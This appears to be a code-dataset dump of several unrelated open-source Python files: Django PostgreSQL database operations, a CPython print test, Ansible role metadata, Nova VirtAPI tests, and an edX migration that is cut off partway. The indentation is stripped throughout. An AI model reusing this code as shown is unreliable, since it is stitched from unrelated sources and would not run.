# This DatabaseOperations class lives in here instead of base.py because it's
# used by both the 'postgresql' and 'postgresql_psycopg2' backends.
class DatabaseOperations(BaseDatabaseOperations):
def __init__(self, connection):
super(DatabaseOperations, self).__init__()
self._postgres_version = None
self.connection = connection
def _get_postgres_version(self):
if self._postgres_version is None:
from django.db.backends.postgresql.version import get_version
cursor = self.connection.cursor()
self._postgres_version = get_version(cursor)
return self._postgres_version
postgres_version = property(_get_postgres_version)
def date_extract_sql(self, lookup_type, field_name):
# http://www.postgresql.org/docs/8.0/static/functions-datetime.html#FUNCTIONS-DATETIME-EXTRACT
if lookup_type == 'week_day':
# For consistency across backends, we return Sunday=1, Saturday=7.
return "EXTRACT('dow' FROM %s) + 1" % field_name
else:
return "EXTRACT('%s' FROM %s)" % (lookup_type, field_name)
def date_interval_sql(self, sql, connector, timedelta):
"""
Implements the interval functionality for expressions.
Format for Postgres:
(datefield + interval '3 days 200 seconds 5 microseconds')
"""
modifiers = []
if timedelta.days:
modifiers.append(u'%s days' % timedelta.days)
if timedelta.seconds:
modifiers.append(u'%s seconds' % timedelta.seconds)
if timedelta.microseconds:
modifiers.append(u'%s microseconds' % timedelta.microseconds)
mods = u' '.join(modifiers)
conn = u' %s ' % connector
return u'(%s)' % conn.join([sql, u'interval \'%s\'' % mods])
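# Illustrative output (inputs assumed): with sql='"start_date"', connector='+'
# and timedelta(days=3, seconds=200) the method returns
#   ("start_date" + interval '3 days 200 seconds')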
def date_trunc_sql(self, lookup_type, field_name):
# http://www.postgresql.org/docs/8.0/static/functions-datetime.html#FUNCTIONS-DATETIME-TRUNC
return "DATE_TRUNC('%s', %s)" % (lookup_type, field_name)
def deferrable_sql(self):
return " DEFERRABLE INITIALLY DEFERRED"
def lookup_cast(self, lookup_type):
lookup = '%s'
# Cast text lookups to text to allow things like filter(x__contains=4)
if lookup_type in ('iexact', 'contains', 'icontains', 'startswith',
'istartswith', 'endswith', 'iendswith'):
lookup = "%s::text"
# Use UPPER(x) for case-insensitive lookups; it's faster.
if lookup_type in ('iexact', 'icontains', 'istartswith', 'iendswith'):
lookup = 'UPPER(%s)' % lookup
return lookup
def field_cast_sql(self, db_type):
if db_type == 'inet':
return 'HOST(%s)'
return '%s'
def last_insert_id(self, cursor, table_name, pk_name):
# Use pg_get_serial_sequence to get the underlying sequence name
# from the table name and column name (available since PostgreSQL 8)
cursor.execute("SELECT CURRVAL(pg_get_serial_sequence('%s','%s'))" % (
self.quote_name(table_name), pk_name))
return cursor.fetchone()[0]
def no_limit_value(self):
return None
def quote_name(self, name):
if name.startswith('"') and name.endswith('"'):
return name # Quoting once is enough.
return '"%s"' % name
def sql_flush(self, style, tables, sequences):
if tables:
if self.postgres_version[0:2] >= (8,1):
# Postgres 8.1+ can do 'TRUNCATE x, y, z...;'. In fact, it *has to*
# in order to be able to truncate tables referenced by a foreign
# key in any other table. The result is a single SQL TRUNCATE
# statement.
sql = ['%s %s;' % \
(style.SQL_KEYWORD('TRUNCATE'),
style.SQL_FIELD(', '.join([self.quote_name(table) for table in tables]))
)]
else:
# Older versions of Postgres can't do TRUNCATE in a single call, so
# they must use a simple delete.
sql = ['%s %s %s;' % \
(style.SQL_KEYWORD('DELETE'),
style.SQL_KEYWORD('FROM'),
style.SQL_FIELD(self.quote_name(table))
) for table in tables]
# 'ALTER SEQUENCE sequence_name RESTART WITH 1;'... style SQL statements
# to reset sequence indices
for sequence_info in sequences:
table_name = sequence_info['table']
column_name = sequence_info['column']
if not (column_name and len(column_name) > 0):
# This will be the case if it's an m2m using an autogenerated
# intermediate table (see BaseDatabaseIntrospection.sequence_list)
column_name = 'id'
sql.append("%s setval(pg_get_serial_sequence('%s','%s'), 1, false);" % \
(style.SQL_KEYWORD('SELECT'),
style.SQL_TABLE(self.quote_name(table_name)),
style.SQL_FIELD(column_name))
)
return sql
else:
return []
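# Sketch of the statements produced above (table and column names assumed):
# on Postgres >= 8.1 a flush of two tables with one serial column yields
#   TRUNCATE "app_foo", "app_bar";
#   SELECT setval(pg_get_serial_sequence('"app_foo"','id'), 1, false);
# while older servers get one DELETE FROM statement per table instead.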
def sequence_reset_sql(self, style, model_list):
from django.db import models
output = []
qn = self.quote_name
for model in model_list:
# Use `coalesce` to set the sequence for each model to the max pk value if there are records,
# or 1 if there are none. Set the `is_called` property (the third argument to `setval`) to true
# if there are records (as the max pk value is already in use), otherwise set it to false.
# Use pg_get_serial_sequence to get the underlying sequence name from the table name
# and column name (available since PostgreSQL 8)
for f in model._meta.local_fields:
if isinstance(f, models.AutoField):
output.append("%s setval(pg_get_serial_sequence('%s','%s'), coalesce(max(%s), 1), max(%s) %s null) %s %s;" % \
(style.SQL_KEYWORD('SELECT'),
style.SQL_TABLE(qn(model._meta.db_table)),
style.SQL_FIELD(f.column),
style.SQL_FIELD(qn(f.column)),
style.SQL_FIELD(qn(f.column)),
style.SQL_KEYWORD('IS NOT'),
style.SQL_KEYWORD('FROM'),
style.SQL_TABLE(qn(model._meta.db_table))))
break # Only one AutoField is allowed per model, so don't bother continuing.
for f in model._meta.many_to_many:
if not f.rel.through:
output.append("%s setval(pg_get_serial_sequence('%s','%s'), coalesce(max(%s), 1), max(%s) %s null) %s %s;" % \
(style.SQL_KEYWORD('SELECT'),
style.SQL_TABLE(qn(f.m2m_db_table())),
style.SQL_FIELD('id'),
style.SQL_FIELD(qn('id')),
style.SQL_FIELD(qn('id')),
style.SQL_KEYWORD('IS NOT'),
style.SQL_KEYWORD('FROM'),
style.SQL_TABLE(qn(f.m2m_db_table()))))
return output
def savepoint_create_sql(self, sid):
return "SAVEPOINT %s" % sid
def savepoint_commit_sql(self, sid):
return "RELEASE SAVEPOINT %s" % sid
def savepoint_rollback_sql(self, sid):
return "ROLLBACK TO SAVEPOINT %s" % sid
def prep_for_iexact_query(self, x):
return x
def check_aggregate_support(self, aggregate):
"""Check that the backend fully supports the provided aggregate.
The population and sample statistics (STDDEV_POP, STDDEV_SAMP,
VAR_POP, VAR_SAMP) were first implemented in Postgres 8.2.
The implementation of population statistics (STDDEV_POP and VAR_POP)
under Postgres 8.2 - 8.2.4 is known to be faulty. Raise
NotImplementedError if this is the database in use.
"""
if aggregate.sql_function in ('STDDEV_POP', 'STDDEV_SAMP', 'VAR_POP', 'VAR_SAMP'):
if self.postgres_version[0:2] < (8,2):
raise NotImplementedError('PostgreSQL does not support %s prior to version 8.2. Please upgrade your version of PostgreSQL.' % aggregate.sql_function)
if aggregate.sql_function in ('STDDEV_POP', 'VAR_POP'):
if self.postgres_version[0:2] == (8,2):
if self.postgres_version[2] is None or self.postgres_version[2] <= 4:
raise NotImplementedError('PostgreSQL 8.2 to 8.2.4 is known to have a faulty implementation of %s. Please upgrade your version of PostgreSQL.' % aggregate.sql_function)
def max_name_length(self):
"""
Returns the maximum length of an identifier.
Note that the maximum length of an identifier is 63 by default, but can
be changed by recompiling PostgreSQL after editing the NAMEDATALEN
macro in src/include/pg_config_manual.h .
This implementation simply returns 63, but can easily be overridden by a
custom database backend that inherits most of its behavior from this one.
"""
return 63
| bsd-3-clause |
mancoast/CPythonPyc_test | fail/311_test_print.py | 8 | 3846 | """Test correct operation of the print function.
"""
# In 2.6, this gives us the behavior we want. In 3.0, it has
# no effect, but it still must parse correctly.
from __future__ import print_function
import unittest
from test import support
import sys
try:
# 3.x
from io import StringIO
except ImportError:
# 2.x
from StringIO import StringIO
NotDefined = object()
# A dispatch table for all 8 combinations of providing
# sep, end, and file.
# I use this machinery so that I'm not just passing default
# values to print; I'm either passing or not passing in the
# arguments.
dispatch = {
(False, False, False):
lambda args, sep, end, file: print(*args),
(False, False, True):
lambda args, sep, end, file: print(file=file, *args),
(False, True, False):
lambda args, sep, end, file: print(end=end, *args),
(False, True, True):
lambda args, sep, end, file: print(end=end, file=file, *args),
(True, False, False):
lambda args, sep, end, file: print(sep=sep, *args),
(True, False, True):
lambda args, sep, end, file: print(sep=sep, file=file, *args),
(True, True, False):
lambda args, sep, end, file: print(sep=sep, end=end, *args),
(True, True, True):
lambda args, sep, end, file: print(sep=sep, end=end, file=file, *args),
}
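# How the table above is used (a sketch mirroring TestPrint.check below): the
# key is a tuple of booleans recording which keyword arguments were explicitly
# supplied, so e.g.
#   dispatch[(True, False, False)](('a', 'b'), '*', None, None)
# behaves like print('a', 'b', sep='*'), leaving end and file at their defaults.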
# Class used to test __str__ and print
class ClassWith__str__:
def __init__(self, x):
self.x = x
def __str__(self):
return self.x
class TestPrint(unittest.TestCase):
def check(self, expected, args,
sep=NotDefined, end=NotDefined, file=NotDefined):
# Capture sys.stdout in a StringIO. Call print with args,
# and with sep, end, and file, if they're defined. Result
# must match expected.
# Look up the actual function to call, based on if sep, end, and file
# are defined
fn = dispatch[(sep is not NotDefined,
end is not NotDefined,
file is not NotDefined)]
with support.captured_stdout() as t:
fn(args, sep, end, file)
self.assertEqual(t.getvalue(), expected)
def test_print(self):
def x(expected, args, sep=NotDefined, end=NotDefined):
# Run the test 2 ways: not using file, and using
# file directed to a StringIO
self.check(expected, args, sep=sep, end=end)
# When writing to a file, stdout is expected to be empty
o = StringIO()
self.check('', args, sep=sep, end=end, file=o)
# And o will contain the expected output
self.assertEqual(o.getvalue(), expected)
x('\n', ())
x('a\n', ('a',))
x('None\n', (None,))
x('1 2\n', (1, 2))
x('1 2\n', (1, ' ', 2))
x('1*2\n', (1, 2), sep='*')
x('1 s', (1, 's'), end='')
x('a\nb\n', ('a', 'b'), sep='\n')
x('1.01', (1.0, 1), sep='', end='')
x('1*a*1.3+', (1, 'a', 1.3), sep='*', end='+')
x('a\n\nb\n', ('a\n', 'b'), sep='\n')
x('\0+ +\0\n', ('\0', ' ', '\0'), sep='+')
x('a\n b\n', ('a\n', 'b'))
x('a\n b\n', ('a\n', 'b'), sep=None)
x('a\n b\n', ('a\n', 'b'), end=None)
x('a\n b\n', ('a\n', 'b'), sep=None, end=None)
x('*\n', (ClassWith__str__('*'),))
x('abc 1\n', (ClassWith__str__('abc'), 1))
# # 2.x unicode tests
# x(u'1 2\n', ('1', u'2'))
# x(u'u\1234\n', (u'u\1234',))
# x(u' abc 1\n', (' ', ClassWith__str__(u'abc'), 1))
# errors
self.assertRaises(TypeError, print, '', sep=3)
self.assertRaises(TypeError, print, '', end=3)
self.assertRaises(AttributeError, print, '', file='')
def test_main():
support.run_unittest(TestPrint)
if __name__ == "__main__":
test_main()
| gpl-3.0 |
bjoshua/ansible | lib/ansible/playbook/role/metadata.py | 51 | 3177 | # (c) 2014 Michael DeHaan, <michael@ansible.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
from six import iteritems, string_types
from ansible.errors import AnsibleParserError
from ansible.playbook.attribute import Attribute, FieldAttribute
from ansible.playbook.base import Base
from ansible.playbook.helpers import load_list_of_roles
from ansible.playbook.role.include import RoleInclude
__all__ = ['RoleMetadata']
class RoleMetadata(Base):
'''
This class wraps the parsing and validation of the optional metadata
within each Role (meta/main.yml).
'''
_allow_duplicates = FieldAttribute(isa='bool', default=False)
_dependencies = FieldAttribute(isa='list', default=[])
_galaxy_info = FieldAttribute(isa='GalaxyInfo')
def __init__(self, owner=None):
self._owner = owner
super(RoleMetadata, self).__init__()
@staticmethod
def load(data, owner, variable_manager=None, loader=None):
'''
Returns a new RoleMetadata object based on the datastructure passed in.
'''
if not isinstance(data, dict):
raise AnsibleParserError("the 'meta/main.yml' for role %s is not a dictionary" % owner.get_name())
m = RoleMetadata(owner=owner).load_data(data, variable_manager=variable_manager, loader=loader)
return m
def _load_dependencies(self, attr, ds):
'''
This is a helper loading function for the dependencies list,
which returns a list of RoleInclude objects
'''
if ds is None:
ds = []
current_role_path = None
if self._owner:
current_role_path = os.path.dirname(self._owner._role_path)
return load_list_of_roles(ds, current_role_path=current_role_path, variable_manager=self._variable_manager, loader=self._loader)
def _load_galaxy_info(self, attr, ds):
'''
This is a helper loading function for the galaxy info entry
in the metadata, which returns a GalaxyInfo object rather than
a simple dictionary.
'''
return ds
def serialize(self):
return dict(
allow_duplicates = self._allow_duplicates,
dependencies = self._dependencies,
)
def deserialize(self, data):
setattr(self, 'allow_duplicates', data.get('allow_duplicates', False))
setattr(self, 'dependencies', data.get('dependencies', []))
| gpl-3.0 |
DirectXMan12/nova-hacking | nova/tests/compute/test_virtapi.py | 5 | 5056 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mox
from nova.compute import manager as compute_manager
from nova import context
from nova import db
from nova import test
from nova.virt import fake
from nova.virt import virtapi
class VirtAPIBaseTest(test.TestCase, test.APICoverage):
cover_api = virtapi.VirtAPI
def setUp(self):
super(VirtAPIBaseTest, self).setUp()
self.context = context.RequestContext('fake-user', 'fake-project')
self.set_up_virtapi()
def set_up_virtapi(self):
self.virtapi = virtapi.VirtAPI()
def assertExpected(self, method, *args, **kwargs):
self.assertRaises(NotImplementedError,
getattr(self.virtapi, method), self.context,
*args, **kwargs)
def test_instance_update(self):
self.assertExpected('instance_update', 'fake-uuid',
dict(host='foohost'))
def test_aggregate_get_by_host(self):
self.assertExpected('aggregate_get_by_host', 'fake-host', key=None)
def test_aggregate_metadata_add(self):
self.assertExpected('aggregate_metadata_add', {'id': 'fake'},
{'foo': 'bar'}, set_delete=False)
def test_aggregate_metadata_delete(self):
self.assertExpected('aggregate_metadata_delete', {'id': 'fake'},
'foo')
def test_security_group_get_by_instance(self):
self.assertExpected('security_group_get_by_instance',
{'uuid': 'fake-id'})
def test_security_group_rule_get_by_security_group(self):
self.assertExpected('security_group_rule_get_by_security_group',
{'id': 'fake-id'})
def test_provider_fw_rule_get_all(self):
self.assertExpected('provider_fw_rule_get_all')
def test_agent_build_get_by_triple(self):
self.assertExpected('agent_build_get_by_triple',
'fake-hv', 'gnu/hurd', 'fake-arch')
def test_instance_type_get(self):
self.assertExpected('instance_type_get',
'fake-instance-type')
class FakeVirtAPITest(VirtAPIBaseTest):
cover_api = fake.FakeVirtAPI
def set_up_virtapi(self):
self.virtapi = fake.FakeVirtAPI()
def assertExpected(self, method, *args, **kwargs):
if method == 'instance_update':
# NOTE(danms): instance_update actually becomes the other variant
# in FakeVirtAPI
db_method = 'instance_update_and_get_original'
else:
db_method = method
self.mox.StubOutWithMock(db, db_method)
if method in ('aggregate_metadata_add', 'aggregate_metadata_delete',
'security_group_rule_get_by_security_group'):
# NOTE(danms): FakeVirtAPI will convert the first argument to
# argument['id'], so expect that in the actual db call
e_args = tuple([args[0]['id']] + list(args[1:]))
elif method in ('security_group_get_by_instance',):
e_args = tuple([args[0]['uuid']] + list(args[1:]))
else:
e_args = args
getattr(db, db_method)(self.context, *e_args, **kwargs).AndReturn(
'it worked')
self.mox.ReplayAll()
result = getattr(self.virtapi, method)(self.context, *args, **kwargs)
self.assertEqual(result, 'it worked')
class FakeCompute(object):
def __init__(self):
self.conductor_api = mox.MockAnything()
self.db = mox.MockAnything()
def _instance_update(self, context, instance_uuid, **kwargs):
# NOTE(danms): Fake this behavior from compute/manager::ComputeManager
return self.conductor_api.instance_update(context,
instance_uuid, kwargs)
class ComputeVirtAPITest(VirtAPIBaseTest):
cover_api = compute_manager.ComputeVirtAPI
def set_up_virtapi(self):
self.compute = FakeCompute()
self.virtapi = compute_manager.ComputeVirtAPI(self.compute)
def assertExpected(self, method, *args, **kwargs):
self.mox.StubOutWithMock(self.compute.conductor_api, method)
getattr(self.compute.conductor_api, method)(
self.context, *args, **kwargs).AndReturn('it worked')
self.mox.ReplayAll()
result = getattr(self.virtapi, method)(self.context, *args, **kwargs)
self.assertEqual(result, 'it worked')
| apache-2.0 |
J861449197/edx-platform | lms/djangoapps/shoppingcart/migrations/0027_add_invoice_history.py | 102 | 22387 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'InvoiceHistory'
db.create_table('shoppingcart_invoicehistory', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('timestamp', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, db_index=True, blank=True)),
('invoice', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['shoppingcart.Invoice'])),
('snapshot', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal('shoppingcart', ['InvoiceHistory'])
def backwards(self, orm):
# Deleting model 'InvoiceHistory'
db.delete_table('shoppingcart_invoicehistory')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'shoppingcart.certificateitem': {
'Meta': {'object_name': 'CertificateItem', '_ormbases': ['shoppingcart.OrderItem']},
'course_enrollment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['student.CourseEnrollment']"}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '128', 'db_index': 'True'}),
'mode': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'orderitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.OrderItem']", 'unique': 'True', 'primary_key': 'True'})
},
'shoppingcart.coupon': {
'Meta': {'object_name': 'Coupon'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2015, 2, 8, 0, 0)'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'expiration_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'percentage_discount': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'shoppingcart.couponredemption': {
'Meta': {'object_name': 'CouponRedemption'},
'coupon': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Coupon']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Order']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'shoppingcart.courseregcodeitem': {
'Meta': {'object_name': 'CourseRegCodeItem', '_ormbases': ['shoppingcart.OrderItem']},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '128', 'db_index': 'True'}),
'mode': ('django.db.models.fields.SlugField', [], {'default': "'honor'", 'max_length': '50'}),
'orderitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.OrderItem']", 'unique': 'True', 'primary_key': 'True'})
},
'shoppingcart.courseregcodeitemannotation': {
'Meta': {'object_name': 'CourseRegCodeItemAnnotation'},
'annotation': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'unique': 'True', 'max_length': '128', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'shoppingcart.courseregistrationcode': {
'Meta': {'object_name': 'CourseRegistrationCode'},
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2015, 2, 8, 0, 0)'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'created_by_user'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invoice': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Invoice']", 'null': 'True'}),
'invoice_item': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.CourseRegistrationCodeInvoiceItem']", 'null': 'True'}),
'mode_slug': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'purchase_order'", 'null': 'True', 'to': "orm['shoppingcart.Order']"})
},
'shoppingcart.courseregistrationcodeinvoiceitem': {
'Meta': {'object_name': 'CourseRegistrationCodeInvoiceItem', '_ormbases': ['shoppingcart.InvoiceItem']},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '128', 'db_index': 'True'}),
'invoiceitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.InvoiceItem']", 'unique': 'True', 'primary_key': 'True'})
},
'shoppingcart.donation': {
'Meta': {'object_name': 'Donation', '_ormbases': ['shoppingcart.OrderItem']},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'donation_type': ('django.db.models.fields.CharField', [], {'default': "'general'", 'max_length': '32'}),
'orderitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.OrderItem']", 'unique': 'True', 'primary_key': 'True'})
},
'shoppingcart.donationconfiguration': {
'Meta': {'object_name': 'DonationConfiguration'},
'change_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'changed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'on_delete': 'models.PROTECT'}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'shoppingcart.invoice': {
'Meta': {'object_name': 'Invoice'},
'address_line_1': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'address_line_2': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'address_line_3': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'company_contact_email': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'company_contact_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'company_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'created': ('model_utils.fields.AutoCreatedField', [], {'default': 'datetime.datetime.now'}),
'customer_reference_number': ('django.db.models.fields.CharField', [], {'max_length': '63', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'internal_reference': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'is_valid': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'modified': ('model_utils.fields.AutoLastModifiedField', [], {'default': 'datetime.datetime.now'}),
'recipient_email': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'recipient_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'total_amount': ('django.db.models.fields.FloatField', [], {}),
'zip': ('django.db.models.fields.CharField', [], {'max_length': '15', 'null': 'True'})
},
'shoppingcart.invoicehistory': {
'Meta': {'object_name': 'InvoiceHistory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invoice': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Invoice']"}),
'snapshot': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'db_index': 'True', 'blank': 'True'})
},
'shoppingcart.invoiceitem': {
'Meta': {'object_name': 'InvoiceItem'},
'created': ('model_utils.fields.AutoCreatedField', [], {'default': 'datetime.datetime.now'}),
'currency': ('django.db.models.fields.CharField', [], {'default': "'usd'", 'max_length': '8'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invoice': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Invoice']"}),
'modified': ('model_utils.fields.AutoLastModifiedField', [], {'default': 'datetime.datetime.now'}),
'qty': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'unit_price': ('django.db.models.fields.DecimalField', [], {'default': '0.0', 'max_digits': '30', 'decimal_places': '2'})
},
'shoppingcart.invoicetransaction': {
'Meta': {'object_name': 'InvoiceTransaction'},
'amount': ('django.db.models.fields.DecimalField', [], {'default': '0.0', 'max_digits': '30', 'decimal_places': '2'}),
'comments': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'created': ('model_utils.fields.AutoCreatedField', [], {'default': 'datetime.datetime.now'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'currency': ('django.db.models.fields.CharField', [], {'default': "'usd'", 'max_length': '8'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invoice': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Invoice']"}),
'last_modified_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'last_modified_by_user'", 'to': "orm['auth.User']"}),
'modified': ('model_utils.fields.AutoLastModifiedField', [], {'default': 'datetime.datetime.now'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'started'", 'max_length': '32'})
},
'shoppingcart.order': {
'Meta': {'object_name': 'Order'},
'bill_to_cardtype': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
'bill_to_ccnum': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'bill_to_city': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_country': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_first': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_last': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_postalcode': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}),
'bill_to_state': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'bill_to_street1': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'bill_to_street2': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'company_contact_email': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
